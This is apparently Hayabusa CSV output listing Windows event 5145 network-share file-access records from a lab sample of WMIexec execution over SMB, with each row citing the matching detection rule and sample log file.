+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cf3e7fb699d07208e389d8d3e5c3e3b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\635558b506364815e8348217e86fdf99 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\b8d89e2f35d492e69789bd504270dff4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\2af2b08e949ae5ebe946684d477a50d5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\e75ae269d8eb8c8fb7bdcce4082ff8c2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\64d113caa8b81caec5c21797931b5624 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\e9062794b3050c9564584baa07300c10 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\1e30da61ac8d97f7b17cdce57fb6a874 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\6f7a4225a199ad7894379512ca6ae50c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\313baced763e9e5054e7694d5594cde5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Temp | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\a1f231be2afa2e51dfc0a1f76644d2f7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\abccca8c6f96e1d3c686a69acb31b9a9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\c926f90d88838d450951cd6c5b41c961 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\3be4139a741b447ab35a2c788a2f4559 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#\d081d0c6a64c64fa9afe4e545f2eaa05 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\f002202a6660cc8ce07f8ae19d6fac84 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
